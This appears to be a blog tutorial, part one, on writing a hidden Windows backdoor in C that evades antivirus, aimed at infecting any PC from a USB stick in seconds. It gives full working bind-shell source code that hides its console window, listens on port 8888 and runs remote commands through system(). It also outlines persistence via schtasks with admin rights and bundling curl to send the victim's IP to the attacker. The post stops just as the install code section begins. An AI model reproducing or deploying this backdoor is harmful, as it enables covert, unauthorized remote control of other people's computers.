How to Program a C Backdoor (And Infect Any PC with an USB Key, and Three Seconds) PART I


How to Program a C Backdoor (And Infect Any PC with an USB Key, and Three Seconds)



This How-To is aimed to anyone, with good C knowledge and who's tired of msfpayload backdoors that are often detected.
I) INTRODUCTION
  • What's a backdoor ?
Basically, a backdoor is any program that allows you to get a remote access on your target. So it can be anything, from a basic php shell to an APT.
  • What's an APT ?
APT stands for "Advanced Persistent Threat". We can see three levels of threats :
1) Basic threat like raw msfpayloads (script-kiddies level)
2) Basic developpers ( for example using basic msfpayloads, and a "legitimate program", with a code Template)
3) APT which is the most Advanced level.



  • What are we gonna do ?
We'll program a nice C backdoor. So we are between level 2 and 3. You'll have to inject it yourself in a legitimate program, or code a "legitimate looking program".
II) GENERAL IDEA
  • What do we want ?
We Want a shell on a distant machine, so we can use it to... We can use it.
We also want it PERSISTENT.
We'll also need to improve it.
Oh, and we also want to backdoor any PC just by plugging an USB stick and clicking on our installer, this must take less than 3 seconds
  • How to do it ?
C language allows you to communicate over the Internet, or with local applications using "Sockets". These sockets can be bind to a specified port and be used for various ways :
Sending forged packets ( port scanner, dos tool...)
Sniffing traffc (sniffers)
Client/Servers applications
So how to use sockets to program a backdoor ?
Well a backdoor is a Client or a Server.
Bind shell backdoors are servers : they bind to a local port and wait for incoming connections in order to provide a shell
Reverse shell backdoors are clients : they connect to a specified IP to provide a shell.
Reverse shells are widely uses as they're less "suspicious".
BUT when you use reverse backdoorrs, you need to specify YOUR IP. Unpleasant right ? Until you've got hacked servers or public IP, this will lead any tracker to your home.
That's why, we'll program a bind shell backdoor. So, if you protect your IP, you'll be less endangered.
BUT How to connect to our backdoor if we don't know what is its IP ? Or if its IP change ? That's why we'll also use a little hack to get the victim IP.
So it's kinda, "hey now i've got your adress : Knock Knock !!



  • Make it persistent ?
You've got lot of options, but I'll keep it simple. Lots of programs that auto-execute at startup add an entry to the Windows Registry.
BUT, this is not sufficient. We want ADMIN RIGHTS. So will use "schtasks" with an xml file to create a task at startup that will autp-launch our backdoor with admin rights.
  • Get Victims IP ?
Really simple. Our project will include the CURL binary in its repertory. Our code will launch CURL in order to connect to a distant server : An ip logging service or a server you have.


III) CODE IT !! The full code is on pastebin (better if you wanna copy/paste it) :
http://pastebin.com/g9R53Tri
This is a copy paste

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<winsock2.h>

#pragma comment(lib,"ws2_32.lib") //Winsock Library

int main(int argc, char *argv[])
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_MINIMIZE);  //won't hide the window without SW_MINIMIZE
    ShowWindow(hWnd, SW_HIDE);
    backdoor();

    return 0;
}

int backdoor()
{
    WSADATA wsa;
    SOCKET s, new_socket;
    struct sockaddr_in server, client;
    int c;
    char *message, server_reply[100000];
    int recv_size;

    printf("\nInitialising Winsock...");
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
    {
        printf("Failed. Error Code : %d", WSAGetLastError());
        return 1;
    }

    printf("Initialised.\n");

    //Create a socket
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
    {
        printf("Could not create socket : %d", WSAGetLastError());
    }

    printf("Socket created.\n");

    //Prepare the sockaddr_in structure
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(8888);

    //Bind
    if (bind(s, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR)
    {
        printf("Bind failed with error code : %d", WSAGetLastError());
        exit(EXIT_FAILURE);
    }

    puts("Bind done");

    //Listen to incoming connections
    listen(s, 3);

    //Accept and incoming connection
    puts("Waiting for incoming connections...");

    c = sizeof(struct sockaddr_in);
    FILE *fp2;
    char ch;
    int i = 0;
    int clean_array = 0;
    char array[10000];
    char concat[11] = " > cmd.txt";
    char error_message[100] = "\n !!! WRONG COMMAND !!!" ;
    char chdir_message[100] = "\n Chdir to : ";
    char chdir_success[100] = "\n Chdir success !\n";
    int ret;
    int chdir_flag;

    while ((new_socket = accept(s, (struct sockaddr *)&client, &c)) != INVALID_SOCKET)
    {
        puts("Connection accepted");

        int a = 1;
        while (a == 1)
        {
            if ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
            {
                puts("recv failed");
            }
            else
            {
                printf("recv size : %d\n", recv_size);
                server_reply[recv_size] = '\0';
                printf("INPUT : %s\n", server_reply);

                chdir_flag = strcmp(server_reply, "chdir");
                printf(">>> %d <<<\n", chdir_flag);

                if (chdir_flag == 0)
                {

                    if (send(new_socket, chdir_message, strlen(chdir_message), 0) < 0)
                    {
                        puts("Send failed");
                        return 1;
                    }

                    if ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
                    {
                        puts("recv failed");
                    }
                    printf("CHDIR  : %d\n", recv_size);
                    server_reply[recv_size] = '\0';
                    printf("INPUT : %s\n", server_reply);
                    chdir(server_reply);
                    printf("Chdir DONE !!!\n");
                   
                    chdir_flag = 1;

                    if (send(new_socket, chdir_success, strlen(chdir_success), 0) < 0)
                    {
                        puts("Send failed");
                        return 1;
                    }


                }
                else
                {

                    printf("Command output >>\n");
                    ret = system(server_reply);
                    printf("\n\n>>> %d <<<\n\n", ret);

                    i = 0;

                    if (ret == 0)
                    {
                        fp2 = fopen("cmd.txt", "r");
                        while ((ch = fgetc(fp2)) != EOF)
                        {
                            printf("%c", ch);
                            array[i] = ch;
                            i++;
                        }
                        array[i] = '\0';



                        remove(fp2);
                        fclose(fp2);

                        if (send(new_socket, array, strlen(array), 0) < 0)
                        {
                            puts("Send failed");
                            return 1;
                        }

                        for (i = 0; i < 10000; i++)
                            array[i] = '\0';

                    }
                    if (ret == 1)
                        send(new_socket, error_message, strlen(error_message), 0);
                }
            }
        }


        if (new_socket == INVALID_SOCKET)
        {
            printf("accept failed with error code : %d", WSAGetLastError());
            return 1;
        }

    }
        closesocket(s);
        WSACleanup();

        return 0;
    }


END !
This is the servers/Backdoor code.


IV) INSTALL IT AND ADD SOME FUNFIRST save, your previous progrm as "server.exe" for example.
Then we'll use the followng C code (to be executed with ADMIN RIGHTS)

Aucun commentaire:

Publier un commentaire